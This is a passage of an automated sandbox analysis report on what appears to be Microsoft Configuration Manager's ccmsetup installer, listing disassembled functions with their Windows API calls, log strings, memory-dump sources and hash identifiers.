                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00620449: __EH_prolog3_GS.LIBCMT ref: 00620450
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_H_prolog3_catch_
                                                                                          • String ID: CCM::Http::CWebProxy::Init$Converting target URL scheme to HTTPS.$Target URL scheme is HTTP: %s$Target URL scheme is HTTPS: %s$https$https$tuq$z
                                                                                          • API String ID: 3654751754-1462493551
                                                                                          • Opcode ID: 5c1df3b1753b2173adcc75fbb74a2b92ed33eaacdfe610ea1fed78b8ed11f2ab
                                                                                          • Instruction ID: 12684a3edfe34ef9612985e32f5c673c0c30f4e933db31f528ae8ded58454931
                                                                                          • Opcode Fuzzy Hash: 5c1df3b1753b2173adcc75fbb74a2b92ed33eaacdfe610ea1fed78b8ed11f2ab
                                                                                          • Instruction Fuzzy Hash: E351D171C0428D9ADF18EFE9C94AAEDBFB9BF51304F148059E5847B282CB745A48CB21
                                                                                          Function 0058513B Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 88threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585247
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Client evaluation: Client is not installed.$DownloadAndExtractManifest(false, 0)$O,$all$ccmsetup.cpp$ccmsetup.cpp$prereqs
                                                                                          • API String ID: 2882836952-1267043384
                                                                                          • Opcode ID: 0107c1313db2ff0258ad0f043f76ef7ba9d64ac7e8370ded1829c977dd6971cd
                                                                                          • Instruction ID: 13ba9e7e1020258e592e7e103467ae809faba8ed79f050aaaa60628d13893cee
                                                                                          • Opcode Fuzzy Hash: 0107c1313db2ff0258ad0f043f76ef7ba9d64ac7e8370ded1829c977dd6971cd
                                                                                          • Instruction Fuzzy Hash: 8B31B430A41799AAEB11FB64CD4ABAEBF627F52704F144084F9457B2C2EBB81F44CB51
                                                                                          Function 0064810C Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 88threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00648113
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006481B1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • GetSiteCode(sSMSSite), xrefs: 006481A7
                                                                                          • ..\lsad.cpp, xrefs: 006481B9
                                                                                          • CCM::LocationServices::LSGetSiteCodeFromWMI, xrefs: 0064811C
                                                                                          • LSGetSiteCodeFromWMI, xrefs: 0064815A
                                                                                          • LSGetSiteCodeFromWMI : Site code returned from WMI is <%s>, xrefs: 00648218
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006481AC
                                                                                          • ..\lsad.cpp, xrefs: 006481A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetSiteCodeFromWMI$GetSiteCode(sSMSSite)$LSGetSiteCodeFromWMI$LSGetSiteCodeFromWMI : Site code returned from WMI is <%s>
                                                                                          • API String ID: 3454896115-4095689340
                                                                                          • Opcode ID: 4707af96d091d7f7b5a80ff44e025be2346f1fcbc9b9fa4a9e155598c314ace7
                                                                                          • Instruction ID: cf065b822a6842b094db5223af583a02ceacab4ea0de9545ba648dd5827dcfcd
                                                                                          • Opcode Fuzzy Hash: 4707af96d091d7f7b5a80ff44e025be2346f1fcbc9b9fa4a9e155598c314ace7
                                                                                          • Instruction Fuzzy Hash: 6F310431940306AEDF10EBA0990A7ED7E66BF92714F140029F640BB3C3CBB95A46C7A5
                                                                                          Function 005A71A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 74threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A71AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A71FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$,tl$CcmSetupManifest::GetFileName$CcmSetupManifest::GetFileName requested an index size is too large!$iIndex >= 0$manifest.cpp$manifest.cpp
                                                                                          • API String ID: 765742432-3925460031
                                                                                          • Opcode ID: 6283d30da391d56e44d416014ebef4a0035f3e454c21c4dd13326e309ec8161c
                                                                                          • Instruction ID: 027bcdbd8468af1bc1930196d99c82a4e2027c2a2fabf0225e0aef11b1db31ac
                                                                                          • Opcode Fuzzy Hash: 6283d30da391d56e44d416014ebef4a0035f3e454c21c4dd13326e309ec8161c
                                                                                          • Instruction Fuzzy Hash: 7A21F871A8834AA7DB14DBA48C1AFED7F65FF49710F18401DF904AB281DB749A00DB94
                                                                                          Function 006062F1 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006062FB
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0060634D
                                                                                          • GetLastError.KERNEL32 ref: 00606357
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00606390
                                                                                          Strings
                                                                                          • ::GetSystemDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0]))), xrefs: 00606386
                                                                                          • CCM::Utility::Filesystem::Directory::GetSystemDirectoryW, xrefs: 00606326
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060638B
                                                                                          • ..\CcmFile.cpp, xrefs: 00606380
                                                                                          • ..\CcmFile.cpp, xrefs: 00606398
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryErrorH_prolog3_catch_LastSystemThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$::GetSystemDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0])))$CCM::Utility::Filesystem::Directory::GetSystemDirectoryW
                                                                                          • API String ID: 3564448566-2135175943
                                                                                          • Opcode ID: 333425e29dcd7bdbcaa645c6b61cfd441c169ecdee380b6383aeb2b6ca06eaf7
                                                                                          • Instruction ID: c3f698d280698649b2de543b6afed97ee58915771006cb135b1330f0bdd750f2
                                                                                          • Opcode Fuzzy Hash: 333425e29dcd7bdbcaa645c6b61cfd441c169ecdee380b6383aeb2b6ca06eaf7
                                                                                          • Instruction Fuzzy Hash: D7110672A80354A6CF60EBF49C4EBDF7A6AAF94710F041196B544A32C2D7788E04C7A1
                                                                                          Function 006063F3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006063FD
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000105,CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW,?,?,?), ref: 0060644F
                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00606459
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00606492
                                                                                          Strings
                                                                                          • CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW, xrefs: 00606428
                                                                                          • ..\CcmFile.cpp, xrefs: 00606482
                                                                                          • ..\CcmFile.cpp, xrefs: 0060649A
                                                                                          • ::GetWindowsDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0]))), xrefs: 00606488
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060648D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryErrorH_prolog3_catch_LastThreadWindows
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$::GetWindowsDirectoryW(szDir, (sizeof(szDir)/sizeof(szDir[0])))$CCM::Utility::Filesystem::Directory::GetWindowsDirectoryW
                                                                                          • API String ID: 4186328837-1428204108
                                                                                          • Opcode ID: f588c511b92ba74a9de2dd87a87294469e160d9bbea07bd97056ae6e1b4cbe4b
                                                                                          • Instruction ID: 0fa03cd908c913d6d25c76d53115b5a4c231eb7a1b48ae3ad5c524e076f63ef7
                                                                                          • Opcode Fuzzy Hash: f588c511b92ba74a9de2dd87a87294469e160d9bbea07bd97056ae6e1b4cbe4b
                                                                                          • Instruction Fuzzy Hash: F511D671A80354B6DB20EBF49C4EBEF7DA9BF94710F044196B944A32C2D7788E00C761
                                                                                          Function 005AE378 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 203threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AE382
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AE508
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AE503
                                                                                          • Product version for product '%s' does not exist. Treat as not installed., xrefs: 005AE4B9
                                                                                          • msiutil.cpp, xrefs: 005AE4F8
                                                                                          • msiutil.cpp, xrefs: 005AE514
                                                                                          • Upgrade code '%s': product = '%s', installed = %d, version = %s, xrefs: 005AE58E
                                                                                          • GetProductInstalledByUpgradeCode, xrefs: 005AE3EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetProductInstalledByUpgradeCode$Product version for product '%s' does not exist. Treat as not installed.$Upgrade code '%s': product = '%s', installed = %d, version = %s$msiutil.cpp$msiutil.cpp
                                                                                          • API String ID: 2239685220-213858085
                                                                                          • Opcode ID: 857a342dbc7ad23204c9d79d97c3161340403bf6e58d7a2854e2758e5c891c5b
                                                                                          • Instruction ID: 635d075aeb09dbae486d0763e8d6b8155fbb7c363b6e61bffe0da3936a576dc9
                                                                                          • Opcode Fuzzy Hash: 857a342dbc7ad23204c9d79d97c3161340403bf6e58d7a2854e2758e5c891c5b
                                                                                          • Instruction Fuzzy Hash: B0914970D01259DAEF20DBA4CC86FEDBBB9BB19304F1484DAE509A7242D7745E84CF61
                                                                                          Function 00640112 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00640119
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060A160: __EH_prolog3.LIBCMT ref: 0060A167
                                                                                            • Part of subcall function 00609891: __EH_prolog3.LIBCMT ref: 00609898
                                                                                            • Part of subcall function 005F4E46: __EH_prolog3_catch.LIBCMT ref: 005F4E4D
                                                                                            • Part of subcall function 005F4E46: GetCurrentThreadId.KERNEL32 ref: 005F4EB2
                                                                                            • Part of subcall function 005F4E46: __CxxThrowException@8.LIBCMT ref: 005F4F8F
                                                                                            • Part of subcall function 0060A7B3: __EH_prolog3.LIBCMT ref: 0060A7BA
                                                                                            • Part of subcall function 0060A7B3: SysFreeString.OLEAUT32(?), ref: 0060A804
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00640229
                                                                                          Strings
                                                                                          • true == elemProperty, xrefs: 0064021F
                                                                                          • CCM::LocationServices::GetCCMSettingsFromClientOperationalSettings, xrefs: 00640178
                                                                                          • ..\lsad.cpp, xrefs: 00640235
                                                                                          • CCM/CommandLine, xrefs: 006401C0
                                                                                          • ..\lsad.cpp, xrefs: 00640219
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00640224
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$Exception@8FreeH_prolog3_catchH_prolog3_catch_StringThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$CCM/CommandLine$CCM::LocationServices::GetCCMSettingsFromClientOperationalSettings$true == elemProperty
                                                                                          • API String ID: 4077184037-218768976
                                                                                          • Opcode ID: a86bf09dd74295ce8e3704745104f361fb11cf27856f7ac54a0bc7e6082d4d14
                                                                                          • Instruction ID: 45ea242a5b34bfd3947f31700a827ee3c717e74cb298cbc8638ddc5ae58a5516
                                                                                          • Opcode Fuzzy Hash: a86bf09dd74295ce8e3704745104f361fb11cf27856f7ac54a0bc7e6082d4d14
                                                                                          • Instruction Fuzzy Hash: BF514B70C4528CEADB10EBE8C949BDEBFB5AF55300F148159E151AB282DBB41B09DBA1
                                                                                          Function 0059A158 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 99synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A183
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported), xrefs: 0059A179
                                                                                          • ccmsetup.cpp, xrefs: 0059A18F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A17E
                                                                                          • ccmsetup.cpp, xrefs: 0059A173
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$Failed to remove ccmsetup service. Error 0x%x$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1076790184-989093447
                                                                                          • Opcode ID: bd214e9b33700d646ee088e4ed2f9845002a30d3d00d25820f14333b9c465c15
                                                                                          • Instruction ID: e9687149dfc9a445bb989a000e84a866835d5d535e1aaa2b504127b179bd25fb
                                                                                          • Opcode Fuzzy Hash: bd214e9b33700d646ee088e4ed2f9845002a30d3d00d25820f14333b9c465c15
                                                                                          • Instruction Fuzzy Hash: 2741AD70A0525AAAEF11EB20DD4EBEDBFA5BF51704F0400E8F0056B192DBB05F84DB52
                                                                                          Function 0059A256 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 99synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A281
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • spClientState->GetIsInMaintenanceMode(bIsInMaintenanceMode), xrefs: 0059A277
                                                                                          • ccmsetup.cpp, xrefs: 0059A28D
                                                                                          • ccmsetup.cpp, xrefs: 0059A271
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A27C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentMutexObjectReleaseSingleThreadWait
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to remove ccmsetup service. Error 0x%x$ccmsetup.cpp$ccmsetup.cpp$spClientState->GetIsInMaintenanceMode(bIsInMaintenanceMode)
                                                                                          • API String ID: 1076790184-980720719
                                                                                          • Opcode ID: 4cf5bbc50365ba04c6b3a57990d5b9b8df3c7edb99e77165e240759415aca228
                                                                                          • Instruction ID: 27f373d62f3be9cc27df13b578b0f89614033a0c28721dda3e3f9f5cc3398355
                                                                                          • Opcode Fuzzy Hash: 4cf5bbc50365ba04c6b3a57990d5b9b8df3c7edb99e77165e240759415aca228
                                                                                          • Instruction Fuzzy Hash: 66419E70A0525AAAEF11EB20DD4EBEDBFA5BB11704F0400E8F005AB192CBB55F84DB52
                                                                                          Function 0059A36B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 99synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059A396
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,00000001), ref: 0059BA15
                                                                                          • ReleaseMutex.KERNEL32(?,?,?,00000001), ref: 0059BA3D
                                                                                          Strings
                                                                                          • Failed to remove ccmsetup service. Error 0x%x, xrefs: 0059B9EC
                                                                                          • GetServiceExecutionMutex(), xrefs: 0059A38C
                                                                                          • ccmsetup.cpp, xrefs: 0059A386
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059A391
                                                                                          • ccmsetup.cpp, xrefs: 0059A3A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
